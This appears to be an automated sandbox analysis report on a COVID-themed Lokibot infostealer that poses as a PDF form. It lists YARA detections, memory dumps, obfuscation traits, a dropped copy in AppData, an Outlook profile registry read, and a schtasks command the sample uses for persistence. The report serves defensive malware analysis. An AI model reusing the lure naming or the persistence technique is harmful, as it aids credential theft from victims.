                Source: 6.2.RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
                Source: 0.2.RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe.3896a98.1.unpack, type: UNPACKEDPEMatched rule: Loki Payload Author: kevoreilly
                Source: 0.2.RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe.3896a98.1.unpack, type: UNPACKEDPEMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
                Source: 00000000.00000002.222223728.00000000027EF000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
                Source: 00000000.00000002.222793737.00000000037D9000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
                Source: 00000006.00000002.237286267.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Loki Payload Author: kevoreilly
                Source: 00000006.00000002.237286267.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
                Initial sample is a PE file and has a suspicious nameShow sources
                Source: initial sampleStatic PE information: Filename: RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe
                Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exeCode function: 0_2_00B8E5600_2_00B8E560
                Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exeCode function: 0_2_00B8E5580_2_00B8E558
                Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exeCode function: 0_2_00B8BCB40_2_00B8BCB4
                Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exeCode function: 0_2_04CF77700_2_04CF7770
                Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exeCode function: 0_2_04CFB1980_2_04CFB198
                Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exeCode function: 0_2_04CFA2A80_2_04CFA2A8
                Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exeCode function: 0_2_04CF18080_2_04CF1808
                Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exeCode function: 0_2_04CF18070_2_04CF1807
                Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exeCode function: 0_2_04CF1A5F0_2_04CF1A5F
                Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exeCode function: 0_2_04CF1A600_2_04CF1A60
                Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exeCode function: 6_2_0040549C6_2_0040549C
                Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exeCode function: 6_2_004029D46_2_004029D4
                Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exeCode function: String function: 0041219C appears 45 times
                Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exeCode function: String function: 00405B6F appears 42 times
                Source: RECAP SARS COVID - 19 - AGENCY FORM.pdf.exeStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                Source: RECAP SARS COVID - 19 - AGENCY FORM.pdf.exeStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                Source: RECAP SARS COVID - 19 - AGENCY FORM.pdf.exeStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                Source: qvDFOnW.exe.0.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                Source: qvDFOnW.exe.0.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                Source: qvDFOnW.exe.0.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                Source: RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe, 00000000.00000002.221579092.0000000000B9B000.00000004.00000020.sdmpBinary or memory string: OriginalFilenameclr.dllT vs RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe
                Source: RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe, 00000000.00000002.229005900.0000000007110000.00000004.00000001.sdmpBinary or memory string: OriginalFilenameSparselyPopulated.dll@ vs RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe
                Source: RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe, 00000000.00000002.228871654.0000000006E70000.00000002.00000001.sdmpBinary or memory string: OriginalFilenamemscorrc.dllT vs RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe
                Source: RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe, 00000000.00000002.229926575.000000000EBB0000.00000002.00000001.sdmpBinary or memory string: System.OriginalFileName vs RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe
                Source: RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe, 00000000.00000002.230426036.000000000ECA0000.00000002.00000001.sdmpBinary or memory string: originalfilename vs RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe
                Source: RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe, 00000000.00000002.230426036.000000000ECA0000.00000002.00000001.sdmpBinary or memory string: OriginalFilenamepropsys.dll.mui@ vs RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe
                Source: RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe, 00000000.00000002.221241977.00000000003B6000.00000002.00020000.sdmpBinary or memory string: OriginalFilenameInt16ArrayTypeInfo.exe: vs RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe
                Source: RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe, 00000000.00000002.229331155.0000000009270000.00000004.00000001.sdmpBinary or memory string: OriginalFilenameRelativeFileUrl.dllL vs RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe
                Source: RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe, 00000006.00000000.220566722.0000000000886000.00000002.00020000.sdmpBinary or memory string: OriginalFilenameInt16ArrayTypeInfo.exe: vs RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe
                Source: RECAP SARS COVID - 19 - AGENCY FORM.pdf.exeBinary or memory string: OriginalFilenameInt16ArrayTypeInfo.exe: vs RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe
                Source: RECAP SARS COVID - 19 - AGENCY FORM.pdf.exeStatic PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED
                Source: 6.2.RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
                Source: 6.2.RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
                Source: 0.2.RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe.3896a98.1.raw.unpack, type: UNPACKEDPEMatched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, reference = https://twitter.com/stvemillertime/status/1237035794973560834, score = , modified = 2021-05-27
                Source: 0.2.RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe.3896a98.1.raw.unpack, type: UNPACKEDPEMatched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
                Source: 0.2.RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe.3896a98.1.raw.unpack, type: UNPACKEDPEMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
                Source: 6.2.RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
                Source: 6.2.RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
                Source: 0.2.RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe.3896a98.1.unpack, type: UNPACKEDPEMatched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, reference = https://twitter.com/stvemillertime/status/1237035794973560834, score = , modified = 2021-05-27
                Source: 0.2.RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe.3896a98.1.unpack, type: UNPACKEDPEMatched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
                Source: 0.2.RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe.3896a98.1.unpack, type: UNPACKEDPEMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
                Source: 00000000.00000002.222223728.00000000027EF000.00000004.00000001.sdmp, type: MEMORYMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
                Source: 00000000.00000002.222793737.00000000037D9000.00000004.00000001.sdmp, type: MEMORYMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
                Source: 00000006.00000002.237286267.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
                Source: 00000006.00000002.237286267.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
                Source: RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe, gZCsHhk6LU0YnGpPZF/QfRWq82JToxowssZ5I.csCryptographic APIs: 'CreateDecryptor'
                Source: RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe, gZCsHhk6LU0YnGpPZF/QfRWq82JToxowssZ5I.csCryptographic APIs: 'CreateDecryptor'
                Source: qvDFOnW.exe.0.dr, gZCsHhk6LU0YnGpPZF/QfRWq82JToxowssZ5I.csCryptographic APIs: 'CreateDecryptor'
                Source: qvDFOnW.exe.0.dr, gZCsHhk6LU0YnGpPZF/QfRWq82JToxowssZ5I.csCryptographic APIs: 'CreateDecryptor'
                Source: 0.2.RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe.2d0000.0.unpack, gZCsHhk6LU0YnGpPZF/QfRWq82JToxowssZ5I.csCryptographic APIs: 'CreateDecryptor'
                Source: 0.2.RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe.2d0000.0.unpack, gZCsHhk6LU0YnGpPZF/QfRWq82JToxowssZ5I.csCryptographic APIs: 'CreateDecryptor'
                Source: 0.0.RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe.2d0000.0.unpack, gZCsHhk6LU0YnGpPZF/QfRWq82JToxowssZ5I.csCryptographic APIs: 'CreateDecryptor'
                Source: 0.0.RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe.2d0000.0.unpack, gZCsHhk6LU0YnGpPZF/QfRWq82JToxowssZ5I.csCryptographic APIs: 'CreateDecryptor'
                Source: 6.2.RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe.7a0000.1.unpack, gZCsHhk6LU0YnGpPZF/QfRWq82JToxowssZ5I.csCryptographic APIs: 'CreateDecryptor'
                Source: 6.2.RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe.7a0000.1.unpack, gZCsHhk6LU0YnGpPZF/QfRWq82JToxowssZ5I.csCryptographic APIs: 'CreateDecryptor'
                Source: 6.0.RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe.7a0000.0.unpack, gZCsHhk6LU0YnGpPZF/QfRWq82JToxowssZ5I.csCryptographic APIs: 'CreateDecryptor'
                Source: 6.0.RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe.7a0000.0.unpack, gZCsHhk6LU0YnGpPZF/QfRWq82JToxowssZ5I.csCryptographic APIs: 'CreateDecryptor'
                Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@6/6@0/1
                Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exeCode function: 6_2_0040650A LookupPrivilegeValueW,AdjustTokenPrivileges,6_2_0040650A
                Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exeCode function: 6_2_0040434D CoInitialize,CoCreateInstance,VariantInit,SysAllocString,VariantInit,VariantInit,SysAllocString,VariantInit,SysFreeString,SysFreeString,CoUninitialize,6_2_0040434D
                Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exeFile created: C:\Users\user\AppData\Roaming\qvDFOnW.exeJump to behavior
                Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exeMutant created: \Sessions\1\BaseNamedObjects\jwmgAWN
                Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4244:120:WilError_01
                Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exeMutant created: \Sessions\1\BaseNamedObjects\8F9C4E9C79A3B52B3F739430
                Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exeFile created: C:\Users\user\AppData\Local\Temp\tmp4A8A.tmpJump to behavior
                Source: RECAP SARS COVID - 19 - AGENCY FORM.pdf.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dllJump to behavior
                Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
                Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                Source: RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe, 00000000.00000002.222186252.00000000027D1000.00000004.00000001.sdmpBinary or memory string: Select * from Clientes WHERE id=@id;;
                Source: RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe, 00000000.00000002.222186252.00000000027D1000.00000004.00000001.sdmpBinary or memory string: Select * from Aluguel Erro ao listar Banco sql-Aluguel.INSERT INTO Aluguel VALUES(@clienteID, @data);
                Source: RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe, 00000000.00000002.222186252.00000000027D1000.00000004.00000001.sdmpBinary or memory string: Select * from SecurityLogonType WHERE id=@id;
                Source: RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe, 00000000.00000002.222186252.00000000027D1000.00000004.00000001.sdmpBinary or memory string: Select * from SecurityLogonType WHERE modelo=@modelo;
                Source: RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe, 00000000.00000002.222186252.00000000027D1000.00000004.00000001.sdmpBinary or memory string: INSERT INTO Itens_Aluguel VALUES(@aluguelID, @aviaoID, @validade);
                Source: RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe, 00000000.00000002.222186252.00000000027D1000.00000004.00000001.sdmpBinary or memory string: Insert into Clientes values (@nome, @cpf, @rg, @cidade, @endereco, @uf, @telefone);
                Source: RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe, 00000000.00000002.222186252.00000000027D1000.00000004.00000001.sdmpBinary or memory string: INSERT INTO Aluguel VALUES(@clienteID, @data);
                Source: RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe, 00000000.00000002.222186252.00000000027D1000.00000004.00000001.sdmpBinary or memory string: INSERT INTO SecurityLogonType VALUES(@modelo, @fabricante, @ano, @cor);
                Source: RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe, 00000000.00000002.222186252.00000000027D1000.00000004.00000001.sdmpBinary or memory string: Select * from SecurityLogonType*Erro ao listar Banco sql-SecurityLogonType,Select * from SecurityLogonType WHERE id=@id;Select * from SecurityLogonType WHERE (modelo LIKE @modelo)
                Source: RECAP SARS COVID - 19 - AGENCY FORM.pdf.exeVirustotal: Detection: 34%
                Source: RECAP SARS COVID - 19 - AGENCY FORM.pdf.exeReversingLabs: Detection: 19%
                Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exeFile read: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exeJump to behavior
                Source: unknownProcess created: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe 'C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe'
                Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exeProcess created: C:\Windows\SysWOW64\schtasks.exe 'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\qvDFOnW' /XML 'C:\Users\user\AppData\Local\Temp\tmp4A8A.tmp'
                Source: C:\Windows\SysWOW64\schtasks.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exeProcess created: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe
                Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exeProcess created: C:\Windows\SysWOW64\schtasks.exe 'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\qvDFOnW' /XML 'C:\Users\user\AppData\Local\Temp\tmp4A8A.tmp'Jump to behavior
                Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exeProcess created: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exeJump to behavior
                Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{95E15D0A-66E6-93D9-C53C-76E6219D3341}\InProcServer32Jump to behavior
                Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
                Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\OutlookJump to behavior
                Source: RECAP SARS COVID - 19 - AGENCY FORM.pdf.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
                Source: RECAP SARS COVID - 19 - AGENCY FORM.pdf.exeStatic file information: File size 1109504 > 1048576
                Source: RECAP SARS COVID - 19 - AGENCY FORM.pdf.exeStatic PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT

                Data Obfuscation:

                barindex
                .NET source code contains method to dynamically call methods (often used by packers)Show sources
                Source: RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe, gZCsHhk6LU0YnGpPZF/QfRWq82JToxowssZ5I.cs.Net Code: stackVariable1.GetMethod("GetDelegateForFunctionPointer", V_0)
                Source: qvDFOnW.exe.0.dr, gZCsHhk6LU0YnGpPZF/QfRWq82JToxowssZ5I.cs.Net Code: stackVariable1.GetMethod("GetDelegateForFunctionPointer", V_0)
                Source: 0.2.RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe.2d0000.0.unpack, gZCsHhk6LU0YnGpPZF/QfRWq82JToxowssZ5I.cs.Net Code: stackVariable1.GetMethod("GetDelegateForFunctionPointer", V_0)
                Source: 0.0.RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe.2d0000.0.unpack, gZCsHhk6LU0YnGpPZF/QfRWq82JToxowssZ5I.cs.Net Code: stackVariable1.GetMethod("GetDelegateForFunctionPointer", V_0)
                Source: 6.2.RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe.7a0000.1.unpack, gZCsHhk6LU0YnGpPZF/QfRWq82JToxowssZ5I.cs.Net Code: stackVariable1.GetMethod("GetDelegateForFunctionPointer", V_0)
                Source: 6.0.RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe.7a0000.0.unpack, gZCsHhk6LU0YnGpPZF/QfRWq82JToxowssZ5I.cs.Net Code: stackVariable1.GetMethod("GetDelegateForFunctionPointer", V_0)
                Yara detected aPLib compressed binaryShow sources
                Source: Yara matchFile source: 6.2.RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe.3896a98.1.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 6.2.RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe.3896a98.1.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000000.00000002.222223728.00000000027EF000.00000004.00000001.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000002.222793737.00000000037D9000.00000004.00000001.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000006.00000002.237286267.0000000000400000.00000040.00000001.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe PID: 5708, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe PID: 3704, type: MEMORY
                Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exeCode function: 0_2_002D8EC7 push es; retn 0000h0_2_002D8ECA
                Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exeCode function: 0_2_00B8C148 push cs; ret 0_2_00B8C156
                Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exeCode function: 0_2_00B8B42A push es; ret 0_2_00B8B42E
                Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exeCode function: 0_2_00B89F93 push es; ret 0_2_00B89F97
                Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exeCode function: 0_2_04CF6DE7 push eax; iretd 0_2_04CF6DF2
                Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exeCode function: 0_2_04CF6DFF push ecx; iretd 0_2_04CF6E06
                Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exeCode function: 0_2_04CF6DF3 push ebx; iretd 0_2_04CF6DFA
                Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exeCode function: 0_2_04CF6EDF push ebx; iretd 0_2_04CF6EE6
                Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exeCode function: 0_2_04CF6E8F push edi; iretd 0_2_04CF6E92
                Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exeCode function: 0_2_04CF6E93 push edx; iretd 0_2_04CF6E96
                Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exeCode function: 0_2_04CF6EAF push edi; iretd 0_2_04CF6EB2
                Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exeCode function: 0_2_04CF6EAB push ebp; iretd 0_2_04CF6EAE
                Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exeCode function: 0_2_04CF6EB3 pushad ; iretd 0_2_04CF6EBA
                Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exeCode function: 0_2_04CF6E6F pushad ; iretd 0_2_04CF6E72
                Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exeCode function: 0_2_04CF6E0F push edx; iretd 0_2_04CF6E16
                Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exeCode function: 0_2_04CF6E3F push ebp; iretd 0_2_04CF6E42
                Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exeCode function: 0_2_04CF6E37 push edi; iretd 0_2_04CF6E3A
                Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exeCode function: 0_2_04CF5634 push cs; retf 0_2_04CF5635
                Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exeCode function: 0_2_04CF6E33 push edi; iretd 0_2_04CF6E36
                Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exeCode function: 0_2_04CF6FEB push edx; iretd 0_2_04CF6FF2
                Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exeCode function: 0_2_04CF6FE7 push esp; iretd 0_2_04CF6FEA
                Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exeCode function: 0_2_04CF6F8F push ds; iretd 0_2_04CF6F9A
                Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exeCode function: 0_2_04CF6F9B push eax; iretd 0_2_04CF6F9E
                Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exeCode function: 0_2_04CF6FAB push ebp; iretd 0_2_04CF6FB2
                Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exeCode function: 0_2_04CF6F53 push ebx; iretd 0_2_04CF6F56
                Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exeCode function: 0_2_04CF6F6F push ebp; iretd 0_2_04CF6F72
                Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exeCode function: 0_2_04CF6F07 push edx; iretd 0_2_04CF6F0A
                Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exeCode function: 0_2_04CF6F17 push edi; iretd 0_2_04CF6F1A
                Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exeCode function: 0_2_04CF6F2F push ecx; iretd 0_2_04CF6F32
                Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exeCode function: 0_2_04CF6F27 push esp; iretd 0_2_04CF6F2A
                Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exeCode function: 0_2_04CF6F3B push eax; iretd 0_2_04CF6F3E
                Source: RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe, CMGEZR8d9sV5or5oCT/OTcwV6T8vLYWOKgwix.csHigh entropy of concatenated method names: '.cctor', 'z9ydY6ER8D', 'FCxdQipVZb', 'sLIdIBTMRo', 'oJGdLVFE43', 'xpxdRyHYFN', 'JhBdaUM7SO', 'lEhdijSmdY', 'UF0dB3uwFK', 'MUUdtwqgtF'
                Source: RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe, gZCsHhk6LU0YnGpPZF/QfRWq82JToxowssZ5I.csHigh entropy of concatenated method names: '.cctor', 'hYKDNVuThr0tR', 'cgQZr4MJH9', 'Tv6Z1evBw9', 'g6cZzJCx19', 'mlB6gleQlU', 'do86dVGMDT', 'y8A6xbswHg', 'eNy6ZoenxX', 'mNr660NRAv'
                Source: RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe, dbnXlqp7dn8caOjpkD/KESKfVUYeSsL3MMKqs.csHigh entropy of concatenated method names: '.ctor', 'Dispose', 'yYtdls8T6v', 'o9UEip5rjI', 'pRBEBVI2li', 'NKFEtCIav9', 'dc8EnLMpuG', 'xeRECMRGVv', 'cvDEslt5eo', 'GwLE4lsLUu'
                Source: RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe, ML3LFDD5R0VNWJw5lq/tnkGD7lgAPwn8VbqeW.csHigh entropy of concatenated method names: '.cctor', 'Lr6dZPdt2B', 'l7id665cu9', 'IDmdEHUkYO', '.ctor', 'L6udAJ5vKq', 'Vj7dh8Lfmh', 'aJPdVvf5Ct', 'MGxd3JujLd', 'fVHdGVMDKg'
